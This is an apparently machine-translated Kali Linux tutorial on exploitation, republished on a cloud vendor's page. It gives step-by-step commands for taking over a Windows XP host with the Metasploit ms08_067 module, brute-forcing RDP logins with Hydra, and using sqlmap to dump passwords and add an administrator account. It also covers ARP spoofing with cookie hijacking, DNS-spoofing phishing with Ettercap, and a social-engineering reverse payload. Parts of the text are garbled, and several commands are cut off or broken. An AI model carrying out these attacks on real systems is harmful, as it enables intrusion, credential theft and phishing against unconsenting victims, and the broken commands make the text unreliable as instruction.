Kali basic knowledge of Linux Infiltration (iii): Exploit

Source: Internet
Author: User
Tags ibm db2 kali linux rdesktop dns spoofing

The exploit phase utilizes the information obtained and the various attack methods to implement infiltration. An encrypted communication vulnerability diagnosis for a Network application vulnerability diagnostic project must be performed. As the name implies, exploit the vulnerability to achieve the purpose of the attack.

  • Metasploit Framework
  • Rdesktop + Hydra
  • Sqlmap
  • Arpspoof
  • Tcpdump + Ferret + Hamster
  • Ettercap
  • SET
Metasploit Framework

Metasploit is an open source security vulnerability detection Tool, and the Metasploit Framework (MSF) was released as an open source in 2003 and is a freely available development framework. It is a powerful open-source platform for developing, testing, and using malicious code, an environment that provides a reliable platform for penetration testing, shellcode authoring, and vulnerability research. This extensible model integrates load control (payload), encoders (encode), no-action generators (Nops), and vulnerabilities to make the Metasploit Framework a way to study high-risk vulnerabilities. It integrates common overflow vulnerabilities and popular shellcode on various platforms, and is constantly updated.

Overview: MSF architecture, components

Example Demo: Intrusion Windows XP SP3 (ms08_067)

MSF architecture

The Metasploit framework does not only have the exploit (overflow) collection feature, it allows you to focus on creating your own overflow module or two development. Few are implemented in assembler and C, and the rest is implemented by Ruby. Overall architecture:

Tools integrates a variety of utilities, most of which are collected for other software

PLUGINS a variety of plugins, most of which are collected by other software. Call its API directly, but only work in the console.

MODULES the various modules of the current Metasploit Framework

MSF core represents the basic API provided by the Metasploit framework core and defines the framework for MSF.

and integrate each sub-system together. The organization is fragmented and is not recommended for change.

MSF Base provides a number of extended, easy-to-use APIs for invocation, allowing changes

The various libraries contained in the Rex LIBRARIES Metasploit Framework are collections of classes, methods, and modules

CLI represents the command line interface

GUI Graphical user interface

Console Console User interface

Web page interface, currently no longer supported

The exploits definition implements a number of overflow modules that do not contain payload words that are an aux

Payload consists of some code that can be dynamically run on a remote host

Nops non-operational instructions for generating buffer fills

Aux modules for auxiliary attacks, such as port scanning tools

Encoders re-encode for anti-detection functions, etc.

Access to Msfconsole can be configured after the database to more convenient and faster query various modules

Start PostgreSQL First

sudo  systemctl start postgresql

Switch to PostgreSQL

su postgres

Create a PostgreSQL Database account

create user root –P

Next, you will be prompted for your password, then confirm your password

Create a database

createdb --owner=root nexp_db

The owner parameter specifies the name of the database, and the next parameter is the database

Then exit into the MSF connection database

db_connect root:[email protected]localhost/nexp_db

After successful connection, you will be prompted:

[-] PostgreSQL already connected to MSF

[-] Run db_disconnect First If you wish to connect to a different database

Msfconsole support System All commands, enter help in terminal to view "Core Commands", "Database backend Commands", "Exploit Commands"

Several vulnerability scanning components of MSF integration Nmap

Nmap is suitable for WINODWS, Linux, Mac and other operating systems. It is used for host discovery, port discovery or enumeration, service discovery, detection of operating system, hardware address, software version, and vulnerability. The Metasploit framework platform integrates NMAP components. It is usually necessary to collect the required information before initiating an attack on the target system, such as acquiring active hosts on the network, ports open to the host, and so on.


Nessus is one of the most widely used vulnerability scanning tools today. Nessus uses client/sever mode, the server side is responsible for security checks, the client is used to configure the Management Server side. The plug-in system is also used on the server, allowing users to join plug-ins that perform specific functions, which allows for faster and more complex security checks.

Nmap for Port scanning
nmap -sS -v www.hdu.edu.cn -oX Desktop/out.xml

Import saved scan results with the Db_import command

db_import Desktop/out.xml

Use the hosts command to view the objects contained in the scan results in XML format

Use the Services command to view detailed service information for the following open ports

Use the Notes command to export details by the port displayed by the scan results

Examples demonstrate the MSF intrusion WinXP (ms_08067) Environment:

Windows XP SP3


Kali Linux


Principle of experiment

Vulnerability Name: Windows Server services RPC Request buffer Overflow Vulnerability (ms08-067)

This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if a user receives a specially crafted RPC request on an affected system. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability to run arbitrary code without authentication. This vulnerability could be used for worm attacks. Firewall best practices and standard default firewall configurations help protect network resources from attacks originating outside the enterprise.

Experimental process

Searching for MS08067 vulnerability msfconsole using the search command

Get from the results


Disclosure date:2008-10-28


description:ms08-067 Microsoft Server Service Relative Path Stack corruption

To invoke the MS08067 vulnerability attack program using the use command

Use Exploit/windows/smb/ms08_067_netapi

Use the show Options command to see the options you need to set

You can see that you also need to set Rhost (destination address), Exploit Target (attack target)

Set the Module Options using the SET command, where you need to set the destination IP

That is set RHOST

Once set using the SET command, you can then use the Show Options command to view the settings

You can see that the target IP has been set.

Then set exploit target and use show targets to view the options

You can see that this vulnerability exists in the following versions of the system

Because the XP system demonstrated by the example is WinXP SP3 Simplified Chinese version, that is

Set target using the set target command, which is set target 34

Use the show options to see that all settings are complete and then attack using exploit or run

After executing the exploit command, get a Meterpreter

Enter a shell in Meterpreter to enter the cmd window

You can then execute the cmd command, such as opening the RDP service

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Use the Netstat-an command to see if the port is open and you can see the open

Then use the Net USER command to view the users in the XP system

You can see that there is a user for Sysorem

Then the login password is exploded for the specified user, such as the Sysorem user here.

hydra rdp -l sysorem -P Desktop/pass.txt

Using Hydra blasting Password: 12345 then you can log in directly to XP for remote control

rdesktop -a 32 -u sysorem -p 12345


SQLMAP is an automated SQL injection tool whose main function is to scan, discover, and exploit the SQL injection vulnerability of a given URL, currently supported by MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, and SAP MaxDB. Five unique SQL injection techniques are used, namely:

1) A Boolean-based blind, that can be based on the return page to determine the conditions of the true and false injection.

2) The time-based blind, that is, cannot judge any information based on the page return content, using conditional statements to see if the time delay statement is executed (that is, if the page return time is increased) to determine.

3) based on the error injection, that is, the page will return incorrect information, or the results of the injected statement directly back to the page.

4) Joint query injection, which can be injected using the Union case.

5) heap Query injection, you can execute the execution of multiple statements at the same time injection.

Summary: Simple introduction to common grammar

Example Demo: Instance demo to invade a server through an injection point

Common syntax Introduction

Get the current user name

sqlmap -u "http://url/news?id=1" --current-user 

Get the current database name

sqlmap -u "http://www.xxoo.com/news?id=1" —current-db

List name

sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D “db_name”

Column fields

sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 #

Get field Contents

"http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0

Example demo to invade a server with one injection point

Target site: a CMS

Test for presence of injection

sqlmap -u "http://xxx/newsInfo.php?news_id=1&classsn=8001" --level 2


SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b766271,0x5a794e4d4a626f5857704c4959506c49507a58666b4c44717864664b596d586d797059515752464d,0x716a786b71),NULL,NULL-- PHML&classsn=9003

Query database user, return ht_zhengke20%

sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --current-user

Whether the query is an administrator account, returns True

sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001”  --is-dba 

Column Database

sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --dbs

Column database user

sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --users

Column database user password

sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --passwords

Get ht_zhengke2 user's plaintext password to Ht_zhengke2

Nmap Scan found open 3389 port

Enter SQL Shell

sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --sql-shell

Add a user to the Sqlshell and elevate to the administrator

NET user root 12345/add

net localgroup Administrators Root/add

Telnet to the server with newly added users


Because the network flow of the LAN is not based on the IP address, it is transmitted according to the MAC address. Therefore, the MAC address on a is forged into a nonexistent MAC address, which will cause the network is not available, a can not ping C. This is a simple ARP spoofing that exploits the vulnerabilities of the ARP protocol. Often in the intranet infiltration, can be used with other tools for network sniffing, traffic hijacking and other functions.

Example application:

ARP spoofing attacks and session hijacking

ARP off-network attack

Command structure:
arpspoof [-i interface] [-t target] host

-I represents the NIC,-T represents the target

ARP Spoofing attack

Windows XP SP3


Kali Linux




Turn on IP forwarding (use cat to see if the settings are successful)

1 >> /proc/sys/net/ipv4/ip_forward

Redirect the victim's traffic to the attacker

arpspoof   -i   eth0   -t

Tcpdump Grab bag (can also use Wireshark)

Because the gateway has routing capabilities, the traffic to the target host can be obtained as long as the local network card is monitored.

Simple usage: tcpdump-w cookie.cap #抓取所有流量写入cookie. Cap

For a period of time to deceive, can casually browse some of the Web pages, chat and so on, such as now access to digital Hangzhou electric, after a period of time to stop cheating, stop grabbing packets, and with the use of ferret processing crawl traffic.

Simple usage: ferret-r cookie.cap #处理抓取的流量


Make sure the processed cookie.cap is running after the root user root directory Hamster

Then set the browser proxy as prompted

Kali's own Firefox browser settings agent

Access Hamster or in the browser after the agent is set up.

Click on the left link to successfully hijack cookies for access

ARP off-network attack

Turn off local IP forwarding, when traffic from the gateway arrives at this time, the target machine cannot get the data from the gateway, thus "off-grid"

arpspoof   -i   eth0


Ettercap is a powerful spoofing tool that allows testers to create and send forged packages, from network adapters to application software-level packages, to bind listening data to a local port, and so on, with great speed. is an auxiliary tool commonly used in man-in-the-middle attacks.

However, more information, interested in the small partners can learn the next

Example Demo: MIMT's DNS spoofing (phishing)

Configure DNS (/ETC/ETTERCAP/ETTER.DNS) for native on LAN address

Turn on the local Web service

Direct access will return to the Apache default page

Use the command ettercap-g to start Ettercap and select Unifind sniffing for network card configuration

Then scan the surviving hosts, scan the hosts list of clicked

Add the gateway address to the TARGET1 and add the attack target to the Target2

Then set the man-in-the-middle attack in the form of ARP spoofing and set bidirectional spoofing

Then enable the Dns_spoof plugin

Then start DNS spoofing

Then, when browsing the www.hdu.edu.cn on the target host, you can achieve the effect of spoofing.

DNS spoofing is often used to obtain administrator information, phishing, etc. in the network infiltration. For example, can forge the intranet router management page, deceive the user to enter the real account password on the management page.


Set is a tool set using the theory of social engineering. It connects with Metasploit to automatically build Microsoft's latest building vulnerabilities, Adobe PDF vulnerabilities, Java applet vulnerabilities, and more, that can be applied to social engineering technologies. It is not only easy to use, but also clever to deceive the eyes of ordinary users. Therefore, it is also an extremely dangerous tool.

Enter the Setoolkit startup set in the shell, which can be tested for social work, penetration, etc., where 1 is the social worker

Choose a connection method of 4 to create a payload and listener

Because the system used for the demo is WinXP 32bit, the choice of connection method is 2

Then set the native IP and port (where the port is set to 4445 to avoid collisions)

Then set will start MSF and through the above set of payloads, when the user is induced and reverse connection to the native 4445 port, will get a meterpreter, get Meterpreter, can be entered? View available commands

For example screenshot screenshot

Kali basic knowledge of Linux Infiltration (iii): Exploit

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.